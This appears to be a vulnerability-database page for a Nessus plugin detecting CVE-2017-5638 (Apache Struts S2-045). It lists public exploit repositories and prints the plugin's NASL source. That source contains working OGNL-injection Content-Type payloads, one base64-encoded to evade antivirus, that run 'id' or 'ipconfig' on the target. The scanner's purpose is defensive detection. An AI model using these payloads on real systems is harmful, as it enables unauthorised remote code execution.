Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote) - Nessus

Critical   Plugin ID: 97610

This page contains detailed information about the Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote) Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.

Plugin Overview


ID: 97610
Name: Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)
Filename: struts_2_5_10_1_rce.nasl
Vulnerability Published: 2017-03-06
This Plugin Published: 2017-03-08
Last Modification Time: 2022-04-11
Plugin Version: 1.25
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: http_version.nasl, webmirror.nasl

Vulnerability Information


Severity: Critical
Vulnerability Published: 2017-03-06
Patch Published: 2017-03-06
CVE [?]: CVE-2017-5638
CPE [?]: cpe:/a:apache:struts
Exploited by Malware: True
In the News: True

Synopsis

The remote web server contains a web application that uses a Java framework that is affected by a remote code execution vulnerability.

Description

The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.

Solution

Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later. Alternatively, apply the workaround referenced in the vendor advisory.

Public Exploits


Target Network Port(s): 80, 8080
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB, GitHub, Immunity Canvas, Core Impact)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote) vulnerability:

  1. Metasploit: exploit/multi/http/struts2_content_type_ognl
    [Apache Struts Jakarta Multipart Parser OGNL Injection]
  2. Exploit-DB: exploits/multiple/remote/41614.rb
    [EDB-41614: Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasploit)]
  3. Exploit-DB: exploits/linux/webapps/41570.py
    [EDB-41570: Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution]
  4. GitHub: https://github.com/0day666/Vulnerability-verification
    [CVE-2017-5638]
  5. GitHub: https://github.com/0xkasra/CVE-2017-5638
    [CVE-2017-5638]
  6. GitHub: https://github.com/3vikram/Application-Vulnerabilities-Payloads
    [CVE-2017-5638]
  7. GitHub: https://github.com/84KaliPleXon3/Payloads_All_The_Things
    [CVE-2017-5638]
  8. GitHub: https://github.com/AndreasKl/CVE-2017-5638
    [CVE-2017-5638]
  9. GitHub: https://github.com/Badbird3/CVE-2017-5638
    [CVE-2017-5638]
  10. GitHub: https://github.com/Cyberleet1337/Payloadswebhack
    [CVE-2017-5638]
  11. GitHub: https://github.com/Delishsploits/PayloadsAndMethodology
    [CVE-2017-5638]
  12. GitHub: https://github.com/DynamicDesignz/Alien-Framework
    [CVE-2017-5638]
  13. GitHub: https://github.com/GuynnR/Payloads
    [CVE-2017-5638]
  14. GitHub: https://github.com/H0j3n/EzpzCheatSheet
    [CVE-2017-5638]
  15. GitHub: https://github.com/Kaizhe/attacker
    [CVE-2017-5638]
  16. GitHub: https://github.com/Muhammd/Awesome-Payloads
    [CVE-2017-5638]
  17. GitHub: https://github.com/NCSU-DANCE-Research-Group/CDL
    [CVE-2017-5638]
  18. GitHub: https://github.com/PWN-Kingdom/Test_Tasks
    [CVE-2017-5638]
  19. GitHub: https://github.com/Prodject/Kn0ck
    [CVE-2017-5638]
  20. GitHub: https://github.com/Pwera/Anchore-Notes
    [CVE-2017-5638]
  21. GitHub: https://github.com/SexyBeast233/SecBooks
    [CVE-2017-5638]
  22. GitHub: https://github.com/SunatP/FortiSIEM-Incapsula-Parser
    [CVE-2017-5638]
  23. GitHub: https://github.com/TamiiLambrado/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner
    [CVE-2017-5638]
  24. GitHub: https://github.com/Tankirat/CVE-2017-5638
    [CVE-2017-5638]
  25. GitHub: https://github.com/XPR1M3/Payloads_All_The_Things
    [CVE-2017-5638]
  26. GitHub: https://github.com/Xhendos/CVE-2017-5638
    [CVE-2017-5638]
  27. GitHub: https://github.com/albinowax/ActiveScanPlusPlus
    [CVE-2017-5638]
  28. GitHub: https://github.com/andrewkroh/auditbeat-apache-struts-demo
    [CVE-2017-5638]
  29. GitHub: https://github.com/andrysec/PayloadsAllVulnerability
    [CVE-2017-5638]
  30. GitHub: https://github.com/andypitcher/check_struts
    [CVE-2017-5638: Apache Struts version analyzer (Ansible) based on CVE-2017-5638]
  31. GitHub: https://github.com/anhtu97/PayloadAllEverything
    [CVE-2017-5638]
  32. GitHub: https://github.com/apkadmin/PayLoadsAll
    [CVE-2017-5638]
  33. GitHub: https://github.com/bhagdave/CVE-2017-5638
    [CVE-2017-5638]
  34. GitHub: https://github.com/bibortone/Jexboss
    [CVE-2017-5638]
  35. GitHub: https://github.com/bongbongco/cve-2017-5638
    [CVE-2017-5638]
  36. GitHub: https://github.com/c002/Java-Application-Exploits
    [CVE-2017-5638]
  37. GitHub: https://github.com/chanchalpatra/payload
    [CVE-2017-5638]
  38. GitHub: https://github.com/colorblindpentester/CVE-2017-5638
    [CVE-2017-5638: CVE-2017-5638 (PoC Exploits)]
  39. GitHub: https://github.com/dock0d1/Apache-Struts-2-CVE-2017-5638-Exploit
    [CVE-2017-5638]
  40. GitHub: https://github.com/eescanilla/Apache-Struts-v3
    [CVE-2017-5638]
  41. GitHub: https://github.com/fupinglee/Struts2_Bugs
    [CVE-2017-5638]
  42. GitHub: https://github.com/gmu-swe/rivulet
    [CVE-2017-5638]
  43. GitHub: https://github.com/gobysec/Goby
    [CVE-2017-5638]
  44. GitHub: https://github.com/grant100/cybersecurity-struts2
    [CVE-2017-5638: Struts2 Application Vulnerable to CVE-2017-5638. Explains how the exploit of the ...]
  45. GitHub: https://github.com/hacking-kubernetes/hacking-kubernetes.info
    [CVE-2017-5638]
  46. GitHub: https://github.com/hktalent/myhktools
    [CVE-2017-5638]
  47. GitHub: https://github.com/homjxi0e/CVE-2017-5638
    [CVE-2017-5638]
  48. GitHub: https://github.com/hook-s3c/CVE-2018-11776-Python-PoC
    [CVE-2017-5638]
  49. GitHub: https://github.com/injcristianrojas/cve-2017-5638
    [CVE-2017-5638: Demo app of THAT data broker's security breach]
  50. GitHub: https://github.com/joaomatosf/jexboss
    [CVE-2017-5638]
  51. GitHub: https://github.com/jongmartinez/CVE-2017-5638
    [CVE-2017-5638: PoC for CVE: 2017-5638 - Apache Struts2 S2-045]
  52. GitHub: https://github.com/jptr218/struts_hack
    [CVE-2017-5638: An implementation of CVE-2017-5638]
  53. GitHub: https://github.com/jrrombaldo/CVE-2017-5638
    [CVE-2017-5638]
  54. GitHub: https://github.com/kk98kk0/Payloads
    [CVE-2017-5638]
  55. GitHub: https://github.com/kyawthiha7/pentest-methodology
    [CVE-2017-5638]
  56. GitHub: https://github.com/leandrocamposcardoso/CVE-2017-5638-Mass-Exploit
    [CVE-2017-5638]
  57. GitHub: https://github.com/lizhi16/CVE-2017-5638
    [CVE-2017-5638]
  58. GitHub: https://github.com/ludy-dev/XworkStruts-RCE
    [CVE-2017-5638: (CVE-2017-5638) XworkStruts RCE Vuln test script]
  59. GitHub: https://github.com/mcassano/cve-2017-5638
    [CVE-2017-5638]
  60. GitHub: https://github.com/milkdevil/jexboss
    [CVE-2017-5638]
  61. GitHub: https://github.com/mrhacker51/ReverseShellCommands
    [CVE-2017-5638]
  62. GitHub: https://github.com/nightfallai/pii-leak-prevention-guide
    [CVE-2017-5638]
  63. GitHub: https://github.com/nixawk/labs
    [CVE-2017-5638]
  64. GitHub: https://github.com/oneplus-x/MS17-010
    [CVE-2017-5638]
  65. GitHub: https://github.com/oneplus-x/Sn1per
    [CVE-2017-5638]
  66. GitHub: https://github.com/ozkanbilge/Payloads
    [CVE-2017-5638]
  67. GitHub: https://github.com/paralelo14/CVE_2017_5638
    [CVE-2017-5638]
  68. GitHub: https://github.com/paralelo14/google_explorer
    [CVE-2017-5638]
  69. GitHub: https://github.com/pasannirmana/Aspire
    [CVE-2017-5638]
  70. GitHub: https://github.com/pthiagu2/Security-multi-stage-data-analysis
    [CVE-2017-5638]
  71. GitHub: https://github.com/qazbnm456/awesome-cve-poc/blob/master/CVE-2017-5638.md
    [CVE-2017-5638]
  72. GitHub: https://github.com/readloud/CVE-2017-5638
    [CVE-2017-5638: This script is intended to validate Apache Struts 2 vulnerability (CVE-2017-5638), ...]
  73. GitHub: https://github.com/rebujacker/CVEPoCs
    [CVE-2017-5638]
  74. GitHub: https://github.com/s1kr10s/Apache-Struts-v4
    [CVE-2017-5638]
  75. GitHub: https://github.com/sUbc0ol/Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638
    [CVE-2017-5638]
  76. GitHub: https://github.com/sUbc0ol/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner
    [CVE-2017-5638]
  77. GitHub: https://github.com/samba234/Sniper
    [CVE-2017-5638]
  78. GitHub: https://github.com/samuelproject/ApacheStruts2
    [CVE-2017-5638]
  79. GitHub: https://github.com/shawnmckinney/remote-code-execution-sample
    [CVE-2017-5638]
  80. GitHub: https://github.com/sobinge/PayloadsAllThesobinge
    [CVE-2017-5638]
  81. GitHub: https://github.com/sobinge/--1
    [CVE-2017-5638]
  82. GitHub: https://github.com/tdcoming/Vulnerability-engine
    [CVE-2017-5638]
  83. GitHub: https://github.com/testpilot031/vulnerability_struts-2.3.31
    [CVE-2017-5638: Build the struts-2.3.31 (CVE-2017-5638) environment]
  84. GitHub: https://github.com/trapp3rhat/CVE-shellshock
    [CVE-2017-5638]
  85. GitHub: https://github.com/tsheth/JavaStruts-App-Terraform
    [CVE-2017-5638]
  86. GitHub: https://github.com/un4ckn0wl3z/CVE-2017-5638
    [CVE-2017-5638]
  87. GitHub: https://github.com/unusualwork/Sn1per
    [CVE-2017-5638]
  88. GitHub: https://github.com/wangeradd1/MyPyExploit
    [CVE-2017-5638]
  89. GitHub: https://github.com/whoadmin/pocs
    [CVE-2017-5638]
  90. GitHub: https://github.com/woods-sega/woodswiki
    [CVE-2017-5638]
  91. GitHub: https://github.com/zema1/oracle-vuln-crawler
    [CVE-2017-5638]
  92. GitHub: https://github.com/0x00-0x00/CVE-2017-5638
    [CVE-2017-5638: Struts02 s2-045 exploit program]
  93. GitHub: https://github.com/Aasron/Struts2-045-Exp
    [CVE-2017-5638]
  94. GitHub: https://github.com/aljazceru/CVE-2017-5638-Apache-Struts2
    [CVE-2017-5638: Tweaking original PoC (https://github.com/rapid7/metasploit-framework/issues/8064) ...]
  95. GitHub: https://github.com/c002/Apache-Struts
    [CVE-2017-5638: An exploit for Apache Struts CVE-2017-5638]
  96. GitHub: https://github.com/cafnet/apache-struts-v2-CVE-2017-5638
    [CVE-2017-5638: Working POC for CVE 2017-5638]
  97. GitHub: https://github.com/donaldashdown/Common-Vulnerability-and-Exploit
    [CVE-2017-5638: This is the Apache Struts CVE-2017-5638 struts 2 vulnerability. The same CVE that ...]
  98. GitHub: https://github.com/eeehit/CVE-2017-5638
    [CVE-2017-5638: CVE-2017-5638 Test environment]
  99. GitHub: https://github.com/evolvesecurity/vuln-struts2-vm
    [CVE-2017-5638: An Ubuntu 16.04 VM Vulnerable to CVE 2017-5638]
  100. GitHub: https://github.com/falcon-lnhg/StrutsShell
    [CVE-2017-5638: Apache Struts (CVE-2017-5638) Shell]
  101. GitHub: https://github.com/Flyteas/Struts2-045-Exp
    [CVE-2017-5638: Struts2 S2-045(CVE-2017-5638)Exp with GUI]
  102. GitHub: https://github.com/ggolawski/struts-rce
    [CVE-2017-5638: Apache Struts CVE-2017-5638 RCE exploitation]
  103. GitHub: https://github.com/Greynad/struts2-jakarta-inject
    [CVE-2017-5638: Golang exploit for CVE-2017-5638]
  104. GitHub: https://github.com/gsfish/S2-Reaper
    [CVE-2017-5638]
  105. GitHub: https://github.com/Iletee/struts2-rce
    [CVE-2017-5638: Exploitable target to CVE-2017-5638]
  106. GitHub: https://github.com/immunio/apache-struts2-CVE-2017-5638
    [CVE-2017-5638: Demo Application and Exploit]
  107. GitHub: https://github.com/invisiblethreat/strutser
    [CVE-2017-5638: Check for Struts Vulnerability CVE-2017-5638]
  108. GitHub: https://github.com/jas502n/S2-045-EXP-POC-TOOLS
    [CVE-2017-5638: S2-045 漏洞 POC-TOOLS CVE-2017-5638]
  109. GitHub: https://github.com/jpacora/Struts2Shell
    [CVE-2017-5638: An exploit (and library) for CVE-2017-5638 - Apache Struts2 S2-045 bug.]
  110. GitHub: https://github.com/lolwaleet/ExpStruts
    [CVE-2017-5638: A php based exploiter for CVE-2017-5638.]
  111. GitHub: https://github.com/m3ssap0/struts2_cve-2017-5638
    [CVE-2017-5638: This is a sort of Java porting of the Python exploit at: ...]
  112. GitHub: https://github.com/Masahiro-Yamada/OgnlContentTypeRejectorValve
    [CVE-2017-5638: This is Valve for Tomcat7 to block Struts 2 Remote Code Execution vulnerability ...]
  113. GitHub: https://github.com/mazen160/struts-pwn
    [CVE-2017-5638: An exploit for Apache Struts CVE-2017-5638]
  114. GitHub: https://github.com/mike-williams/Struts2Vuln
    [CVE-2017-5638: Struts 2 web app that is vulnerable to CVE-2017-98505 and CVE-2017-5638]
  115. GitHub: https://github.com/mthbernardes/strutszeiro
    [CVE-2017-5638: Telegram Bot to manage botnets created with struts vulnerability(CVE-2017-5638)]
  116. GitHub: https://github.com/oktavianto/CVE-2017-5638-Apache-Struts2
    [CVE-2017-5638: Example PHP Exploiter for CVE-2017-5638]
  117. GitHub: https://github.com/opt9/Strutscli
    [CVE-2017-5638: Struts2 RCE CVE-2017-5638 CLI shell]
  118. GitHub: https://github.com/opt9/Strutshock
    [CVE-2017-5638: Struts2 RCE CVE-2017-5638 non-intrusive check shell script]
  119. GitHub: https://github.com/payatu/CVE-2017-5638
    [CVE-2017-5638: Apache Struts 2.0 RCE vulnerability - Allows an attacker to inject OS commands into ...]
  120. GitHub: https://github.com/PolarisLab/S2-045
    [CVE-2017-5638: Struts2 S2-045(CVE-2017-5638)Vulnerability environment - ...]
  121. GitHub: https://github.com/pr0x1ma-byte/cybersecurity-struts2
    [CVE-2017-5638: Struts2 Application Vulnerable to CVE-2017-5638. Explains how the exploit of the ...]
  122. GitHub: https://github.com/R4v3nBl4ck/Apache-Struts-2-CVE-2017-5638-Exploit-
    [CVE-2017-5638: Exploit created by: R4v3nBl4ck end Pacman]
  123. GitHub: https://github.com/random-robbie/CVE-2017-5638
    [CVE-2017-5638: CVE: 2017-5638 in different formats]
  124. GitHub: https://github.com/ret2jazzy/Struts-Apache-ExploitPack
    [CVE-2017-5638: These are just some script which you can use to detect and exploit the Apache Struts ...]
  125. GitHub: https://github.com/riyazwalikar/struts-rce-cve-2017-5638
    [CVE-2017-5638: Struts-RCE CVE-2017-5638]
  126. GitHub: https://github.com/SpiderMate/Stutsfi
    [CVE-2017-5638: An exploit for CVE-2017-5638 Remote Code Execution (RCE) Vulnerability in Apache ...]
  127. GitHub: https://github.com/tahmed11/strutsy
    [CVE-2017-5638: Strutsy - Mass exploitation of Apache Struts (CVE-2017-5638) vulnerability]
  128. GitHub: https://github.com/win3zz/CVE-2017-5638
    [CVE-2017-5638: Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution - Shell Script ...]
  129. GitHub: https://github.com/initconf/CVE-2017-5638_struts
    [CVE-2017-5638: Detection for Apache Struts recon and compromise]
  130. GitHub: https://github.com/jas502n/st2-046-poc
    [CVE-2017-5638: St2-046-poc CVE-2017-5638]
  131. GitHub: https://github.com/jrrdev/cve-2017-5638
    [CVE-2017-5638: Cve-2017-5638 Vulnerable site sample]
  132. GitHub: https://github.com/KarzsGHR/S2-046_S2-045_POC
    [CVE-2017-5638: S2-046|S2-045: Struts 2 Remote Code Execution vulnerability(CVE-2017-5638)]
  133. GitHub: https://github.com/sjitech/test_struts2_vulnerability_CVE-2017-5638
    [CVE-2017-5638: Test struts2 vulnerability CVE-2017-5638 in Mac OS X]
  134. GitHub: https://github.com/xsscx/cve-2017-5638
    [CVE-2017-5638: Example PoC Code for CVE-2017-5638 | Apache Struts Exploit]
  135. Immunity Canvas: CANVAS

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information


CVSS Score Source [?]: CVE-2017-5638
CVSS V2 Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:OF/RC:C
CVSS Base Score:10.0 (High)
Impact Subscore:10.0
Exploitability Subscore:10.0
CVSS Temporal Score:8.7 (High)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:8.7 (High)
CVSS V3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C
CVSS Base Score:10.0 (Critical)
Impact Subscore:6.0
Exploitability Subscore:3.9
CVSS Temporal Score:9.5 (Critical)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:9.5 (Critical)

Go back to menu.

Plugin Source


This is the struts_2_5_10_1_rce.nasl nessus plugin source code. This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(97610);
  script_version("1.25");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2017-5638");
  script_bugtraq_id(96729);
  script_xref(name:"CERT", value:"834067");
  script_xref(name:"EDB-ID", value:"41570");
  script_xref(name:"EDB-ID", value:"41614");
  script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/05/03");

  script_name(english:"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a web application that uses a Java
framework that is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Struts running on the remote host is affected by
a remote code execution vulnerability in the Jakarta Multipart parser
due to improper handling of the Content-Type header. An
unauthenticated, remote attacker can exploit this, via a specially
crafted Content-Type header value in the HTTP request, to potentially
execute arbitrary code, subject to the privileges of the web server
user.");
  script_set_attribute(attribute:"see_also", value:"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html");
  # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?77e9c654");
  script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1");
  script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-045");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.
Alternatively, apply the workaround referenced in the vendor advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5638");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:"CANVAS");
  script_set_attribute(attribute:"in_the_news", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/06");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/03/06");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/08");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl", "webmirror.nasl");
  script_require_ports("Services/www", 80, 8080);

  exit(0);
}

include("http.inc");

port = get_http_port(default:8080);
cgis = get_kb_list('www/' + port + '/cgi');

urls = make_list('/');

# To identify actions that we can test the exploit on we will look
# for files with the .action / .jsp / .do suffix from the KB.
if (!isnull(cgis))
{
  foreach cgi (cgis)
  {
    match = pregmatch(pattern:"((^.*)(/.+\.act(ion)?)($|\?|;))", string:cgi);
    if (match)
    {
      urls = make_list(urls, match[0]);
      if (!thorough_tests) break;
    }
    match2 = pregmatch(pattern:"(^.*)(/.+\.jsp)$", string:cgi);
    if (!isnull(match2))
    {
      urls = make_list(urls, match2[0]);
      if (!thorough_tests) break;
    }
    match3 = pregmatch(pattern:"(^.*)(/.+\.do)$", string:cgi);
    if (!isnull(match3))
    {
      urls = make_list(urls, match3[0]);
      if (!thorough_tests) break;
    }
    if (cgi =~ "struts2?(-rest)?-showcase")
    {
      urls = make_list(urls, cgi);
      if (!thorough_tests) break;
    }
  }
}
if (thorough_tests)
{
  cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');
  if (!isnull(cgi2)) urls = make_list(urls, cgi2);

  cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');
  if (!isnull(cgi3)) urls = make_list(urls, cgi3);

  cgi4 = get_kb_list('www/' + port + '/content/extensions/do');
  if (!isnull(cgi4)) urls = make_list(urls, cgi4);
}

urls = list_uniq(urls);

vuln = FALSE;

rand_var = rand_str(length:8);
header_payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Tenable','" + rand_var + "')}.multipart/form-data";
headers_1 = make_array("Content-Type", header_payload);

# The OGNL exploit has been base64 encoded to evade AV quarantine for certain AV
# vendors.
# {'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','id'}))
exploit = "JXsoI189J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZX";
exploit += "h0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJ";
exploit += "lckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1w";
exploit += "aG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpb";
exploit += "D0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi";
exploit += "5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2t";
exploit += "hZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2Vz";
exploit += "KCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigja";
exploit += "XN3aW49KEBqYXZhLmxhbmcuU3lzdGVtQGdldFByb3BlcnR5KCdvcy5uYW1lJykudG";
exploit += "9Mb3dlckNhc2UoKS5jb250YWlucygnd2luJykpKS4oI2NtZHM9KCNpc3dpbj97J2N";
exploit += "tZC5leGUnLCcvYycsJ2lwY29uZmlnJywnL2FsbCd9OnsnYmFzaCcsJy1jJywnaWQn";
exploit += "fSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwL";
exploit += "nJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS";
exploit += "4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEB";
exploit += "nZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNv";
exploit += "bW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI";
exploit += "3JvcykpLigjcm9zLmZsdXNoKCkpfQo=";

headers_2 = make_array("Content-Type", chomp(base64_decode(str:exploit)));

# Since struts apps could be taking longer
timeout = get_read_timeout() * 2;
if(timeout < 10)
  timeout = 10;
http_set_read_timeout(timeout);

foreach url (urls)
{
  ############################################
  # Method 1
  ############################################
  res = http_send_recv3(
    method       : "GET",
    item         : url,
    port         : port,
    add_headers  : headers_1,
    exit_on_fail : TRUE
  );
  if ( ("X-Tenable: "+ rand_var ) >< res[1] )
    vuln = TRUE;
  # Stop after first vulnerable Struts app is found
  if (vuln) break;

  ############################################
  # Method 2
  ############################################

  cmd_pats = make_array();
  cmd_pats['id'] = "uid=[0-9]+.*\sgid=[0-9]+.*";
  cmd_pats['ipconfig'] = "Subnet Mask|Windows IP|IP(v(4|6)?)? Address";

  res = http_send_recv3(
    method       : "GET",
    item         : url,
    port         : port,
    add_headers  : headers_2,
    exit_on_fail : TRUE
  );

  if ("Windows IP" >< res[2] || "uid" >< res[2])
  {
    if (pgrep(pattern:cmd_pats['id'], string:res[2]))
    {
      output = strstr(res[2], "uid");
      if (!empty_or_null(output))
      {
        vuln = TRUE;
        vuln_url = build_url(qs:url, port:port);
        break;
      }
    }
    else if (pgrep(pattern:cmd_pats['ipconfig'], string:res[2]))
    {
      output = strstr(res[2], "Windows IP");
      if (!empty_or_null(output))
      {
        vuln = TRUE;
        vuln_url = build_url(qs:url, port:port);
        break;
      }
    }
  }
}


if (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');

security_report_v4(
  port       : port,
  severity   : SECURITY_HOLE,
  generic    : TRUE,
  request    : make_list(http_last_sent_request()),
  output     : chomp(output)
);

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/struts_2_5_10_1_rce.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\struts_2_5_10_1_rce.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/struts_2_5_10_1_rce.nasl

Go back to menu.

How to Run


Here is how to run the Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote) as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select CGI abuses plugin family.
  6. On the right side table select Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote) plugin ID 97610.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl struts_2_5_10_1_rce.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a struts_2_5_10_1_rce.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - struts_2_5_10_1_rce.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state struts_2_5_10_1_rce.nasl -t <IP/HOST>

Go back to menu.

References


BID | SecurityFocus Bugtraq ID: CERT | Computer Emergency Response Team: See also: Similar and related Nessus plugins:
  • 99593 - MySQL Enterprise Monitor 3.1.x < 3.1.7.8023 / 3.2.x < 3.2.7.1204 / 3.3.x < 3.3.3.1199 Multiple Vulnerabilities (April 2017 CPU)
  • 136998 - Oracle WebCenter Sites Multiple Vulnerabilities (April 2017 CPU)
  • 99528 - Oracle WebLogic Server Multiple Vulnerabilities (April 2017 CPU)
  • 101815 - Oracle WebLogic Server Multiple Vulnerabilities (July 2017 CPU)
  • 103663 - Oracle WebLogic Server Multiple Vulnerabilities
  • 141576 - Selligent Message Studio Struts Code Execution (CVE-2017-5638)
  • 97576 - Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)
  • 66935 - Apache Struts 2 Crafted Parameter Arbitrary OGNL Expression Remote Command Execution
  • 66931 - Apache Struts 2 OGNL Expression Handling Double Evaluation Error Remote Command Execution
  • 68981 - Apache Struts 2 'action:' Parameter Arbitrary Remote Command Execution
  • 70168 - Apache Struts 2 'action:' Parameter Prefix Security Constraint Bypass
  • 73203 - Apache Struts 2 'class' Parameter ClassLoader Manipulation
  • 119728 - Apache Struts 2 'method:' Prefix Arbitrary Remote Command Execution
  • 90152 - Apache Struts 2 Tag Attribute Double OGNL Evaluation RCE
  • 91811 - Apache Struts 2 REST Plugin OGNL Expression Handling RCE
